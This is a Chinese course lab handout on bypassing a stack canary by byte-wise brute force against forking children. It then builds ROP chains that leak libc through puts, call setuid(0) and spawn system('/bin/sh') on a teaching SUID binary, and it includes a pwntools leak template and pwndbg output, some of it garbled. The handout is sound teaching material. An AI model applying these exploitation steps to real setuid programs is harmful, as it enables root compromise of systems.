实验二 栈保护机制绕过与漏洞利用

实验目的

- 掌握反汇编代码分析工具分析原理与使用方法
- 掌握栈溢出和栈保护机制的原理
- 掌握栈溢出漏洞的利用技巧和栈保护机制的绕过手法
- 理解栈溢出漏洞的防范措施

实验要求

- 调试与掌握函数反汇编执行流程
- 定位程序溢出点
- 栈保护机制爆破绕过,劫持程序控制流;
- · 编写 ROP 链,获取具有任意命令执行功能的 Shell;

实验环境

实验平台: pwn.hust.college

• 操作系统: Ubuntu 20.04 LTS

溢出软件: mitigation-bypass

• 溢出工具: pwndbg, vscode, XFCE 桌面, bash 命令行

实验内容

以下操作步骤是以 Ubuntu 22.04 LTS 为环境的参考操作过程,注意,在不同的 Ubuntu 发行版版本中,其程序栈帧布局可能略有差异,需要根据实际调试结果定位相 关指令地址。

• 定位程序溢出点:

mitigation-bypass 是一款用于教学用途的测试程序,其循环读取用户输入,经过一定的逻辑检查之后将结果返回。当用户输入足量长度的数据时,Stack Canary 的值将被覆盖,程序会检测到溢出并报错。

下图 1 所示, 即将读取用户输入, 此时原始 Stack Canary 的值为 0x51a923c50cc52400。

```
pwndbg> x/4i $pc
=> 0x4012da <read_input+56>: call 0x4010f0 <read@plt>
  0x4012df <read_input+61>: nop
  0x4012e0 <read_input+62>:
                        mov
                              rax, QWORD PTR [rbp-0x8]
                        xor
  0x4012e4 <read_input+66>:
                              rax, QWORD PTR fs:0x28
pwndbg> tele $rsp+0x60 4
       0x7ffd246743b0 → 0x7ffd246743e0 ← 0x0
00:0000
         0x7ffd246743b8 <- 0x51a923c50cc52400
01:0008
02:0010 rbp 0x7ffd246743c0 → 0x7ffd246743e0 ← 0x0
pwndbg>
```

图 1 原始栈布局

执行完 read 函数之后,发现用户输入溢出覆盖了 Stack Canary 的最低两个字节,即覆盖后的值为 0x51a923c50cc50100。

图 2 溢出后栈布局

之后程序检测到栈上 Canary 的值发生变化,从而报错。

图 3 栈溢出检测报错

Stack Canary 爆破绕过

程序会循环 fork 子进程,子进程不断读取用户输入,当子进程检测到栈溢出时会报检测错误,但并不会令父进程结束运行,而子进程的 Stack Canary 与父进程一致,因此可以通过每次爆破一字节来不断泄漏得到原始的 Stack Canary,从而绕过栈溢出保护。

ROP 编写

本次实验的 ROP 链的要求是能够在平台的 libc 中获得 shell,因为 libc 函数相对 libc 基地址的偏移量是固定的,所以当我们获取到泄漏的 libc 函数后,我们可以根据 libc 版本获取到具体每个函数的偏移地址,例如常见的 system 函数。

在常规机器中需要构造如下 ROP 链, 如图 4 所示:

rbp-0x10	padding	
rbp-0x8	canary	
rbp		
rbp+0x8	pop_rdi_ret_addr	
rbp+0x10	bin_sh_addr	
rbp+0x18	system_addr	

图 4 获取 shell 的栈帧布置

由于实验环境的特殊性,每个题目都拥有 SUID 权限,本次实验则需要多增添一个 setuid(0) 用来设置我们的权限,也就是需要构造如下 ROP,即下图 5:

rbp-0x10	padding	
rbp-0x8	canary	
rbp		
rbp+0x8	pop_rdi_ret_addr	
rbp+0x10	0	
rbp+0x18	setuid_addr	
rbp+0x20	pop_rdi_ret_addr	
rbp+0x28	bin_sh_addr	
rbp+0x30	system_addr	

图 5 通过 setuid 获取 shell 的栈帧布置

此时程序执行到被溢出覆盖的返回地址时,会执行我们构造的 ROP 链,达到控制流劫持的目的,进而在实验环境中获得 shell。

• 程序编写思路

• 逐字节爆破 canary

首先,因为题目开启了 canary 保护,我们需要逐字节爆破 canary,通过对每个字节进行爆破,当 canary 的某个字节不正确时,程序会崩溃,当爆破成功时程序会正常执行,canary 存在地址如下图 6 所示:

rbp-0x10	padding
rbp-0x8	canary
rbp	
rbp+0x8	ret_addr
rbp+0x10	
rbp+0x18	

图 6 爆破 canary 的栈帧布置

逐字节爆破情况如下图 7 所示:

覆盖值	Canary 值	程序流
11 87 6a 89 9f 7e 3c	15 87 6a 89 9f 7e 3c	失败
12 87 6a 89 9f 7e 3c	15 8 7 6a 89 9f 7e 3c	失败
	15 87 6a 89 9f 7e 3c	
15 87 6a 89 9f 7e 3c	15 87 6a 89 9f 7e 3c	成功

图 7 逐字节爆破

使用工具 pwntools,将我们需要溢出的恶意数据,发送给 server,在爆破一段时间之后,得到本次的 canary 值为 15 87 6a 89 9f 7e 3c 然后我们将获得的 canary 覆盖到原本的 canary 地址处(rbp-8) 达到绕过 canary 的目的。

• 泄漏 libc 地址

我们可以通过 ROP 将 read 函数的返回地址修改,然后泄漏出开启 PIE 后的某些函数的地址,减去偏移地址即可获得 libc 的基地址,也即是下列代码:

部署的 ROP 栈如下图 8 所示:

rbp-0x10	padding	
rbp-0x8	canary	
rbp		
rbp+0x8	pop_rdi_ret_addr	
rbp+0x10	function_got_addr	
rbp+0x18	function_plt_addr	
rbp+0x20	main_addr	

图 8 leak 地址的栈帧布置

我们可以通过调用 put 函数,输出我们的内存中的地址,我们最后需要返回 main 起始地址,让我们能够继续运行程序攻击。为简化 ASLR 绕过,特提供如下 leak 模版:

```
binary = './mitigation-bypass'
elf = ELF(binary)
pop_rdi_ret = next(elf.search(asm('pop rdi;ret'),
executable=True))

//布置栈帧
payload = prefix + p64(0)
payload += p64(pop_rdi_ret)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(elf.sym['main'])

//发送 payload
p.sendafter('pwn me :)\n', payload)
//获取随机化后的 libc 基地址
libc.address = u64(p.recvuntil('\n')[:-1].ljust(8, b'\x00')) -
libc.sym['puts']
```

根据 elfcrackme 中的 plt 和 got 关卡,以及课上 plt 和 got 表项的 PPT 可知,调用一个动态链接的函数我们需要调用 plt 和他的 got 表,即,

```
call puts -> puts 的 plt 表 -> puts 的 got 表
```

```
[ DISASM / x86-64 / set emulate on ]
0x401347 <main+81>
                                        dword ptr [rbp - 4], 0
0x40134b <main+85>
0x401359 <main+99>
0x40135e <main+104>
                                        read_input
                                        rdi, [rip + 0xd36]
0x401363 <main+109>
                                        puts@plt
                                                                       <puts@plt>
0x40136a <main+116>
     s: 0x4020a0 ← 'have fun'
0x40136f <main+121>
                                 jmp
0x401371
                                        word ptr cs:[rax + rax]
0x40137b
                                        dword ptr [rax + rax]
0x401380 <__libc_csu_init>
                                 endbr64
0x401384 <__libc_csu_init+4>
```

我们可以看到调用 puts 函数也就是 call puts@plt,因此我们想要的就是 puts(puts@got),因为延时加载,当执行过 puts 函数后,got 表中也就存储了 puts 函数实际加载的地址。

```
pwndbg> got
Filtering out read-only entries (display them with -r or --show-readonly)

State of the GOT of /home/liber/Downloads/software-security-lab-dojo-solution/mitigation-bypass/mitigation-bypass:
GOT protection: Partial RELRO | Found 8 GOT entries passing the filter
[0x404018] outchar@GLIBC 2.2.5 -> 0x7ffff7c82980 (outchar) -- endbr64
[0x404020] puts@GLIBC_2.2.5 -> 0x7ffff7c80e50 (puts) -- endbr64
[0x404028] __stack_chk_fail@GLIBC_2.4 -> 0x401050 -- endbr64
[0x404038] setbuf@GLIBC_2.2.5 -> 0x7ffff7c87fe0 (setbuf) -- endbr64
[0x404038] read@GLIBC_2.2.5 -> 0x7ffff7d149c0 (read) -- endbr64
[0x4040404] exit@GLIBC_2.2.5 -> 0x401080 -- endbr64
[0x4040404] wait@GLIBC_2.2.5 -> 0x401080 -- endbr64
[0x4040404] wait@GLIBC_2.2.5 -> 0x401080 -- endbr64
[0x4040405] fork@GLIBC_2.2.5 -> 0x7ffff7cea6a0 (fork) -- endbr64
pwndbg>
```

为什么需要在栈中布置 main 函数的地址呢?

根据 PPT 中讲述可知,开启 ASLR 后,每次加载 libc 的地址都会随机化,因此我们需要在一次程序执行的过程中完成我们的攻击,为了保证攻击链条的完整性,因此我们需要继续让他跳转回 main,程序会继续执行我们的漏洞点,我们因此可以根据泄露出的地址,进一步进行 ROP 的栈帧部署。

setuid(0)

通过 ROP,使用 libc 中的 setuid 函数,设置为 0,将赋予我们 root 的权限进行操作,根据调试代码,我们可以获得 setuid 函数的执行栈的情况,也就是将值赋予 rdi,然后调用 setuid 函数,如下图 9 所示。

rbp-0x10	padding
rbp-0x8	canary
rbp	
rbp+0x8	pop_rdi_ret_addr
rbp+0x10	0
rbp+0x18	setuid

图 9 setuid 的栈帧布置

• ret2libc

ret2libc,通过我们上述泄漏的地址和 canary,我们可以获得完整的程序控制,因此,我们可以通过调用 system("/bin/sh")从而获得完整的 shell,如下图 10 所示。

rbp-0x10	padding	
rbp-0x8	canary	
rbp		
rbp+0x8	pop_rdi_ret_addr	
rbp+0x10	bin_sh_addr	
rbp+0x18	system_addr	

图 10 ret2libc 的栈帧布置

将上面的几个步骤联合起来,即可获得完整的 python 攻击脚本。

完整的布置栈如下图 11 所示:

rbp-0x10	padding		rbp-0x10	padding
rbp-0x8	canary		rbp-0x8	canary
rbp			rbp	
rbp+0x8	pop_rdi_ret_addr		rbp+0x8	pop_rdi_ret_addr
rbp+0x10	elf . got['puts']	LEAK	rbp+0x10	0
rbp+0x18	elf.plt['puts']		rbp+0x18	setuid_addr
rbp+0x20	elf . sym['main']		rbp+0x20	pop_rdi_ret_addr
rbp+0x28			rbp+0x28	bin_sh_addr
rbp+0x30			rbp+0x30	system_addr

图 11 从 leak 到 ret2libc 的栈帧变换

实验进阶

可以尝试更为复杂的 ROP, 完成高级功能。

实验总结

在本次试验中,要求给出自己漏洞寻找与分析的体会。包括难点,关键技术以及 遇到的问题解决方法。

实验代码

根据课堂讲解内容给出 python 利用脚本相关代码。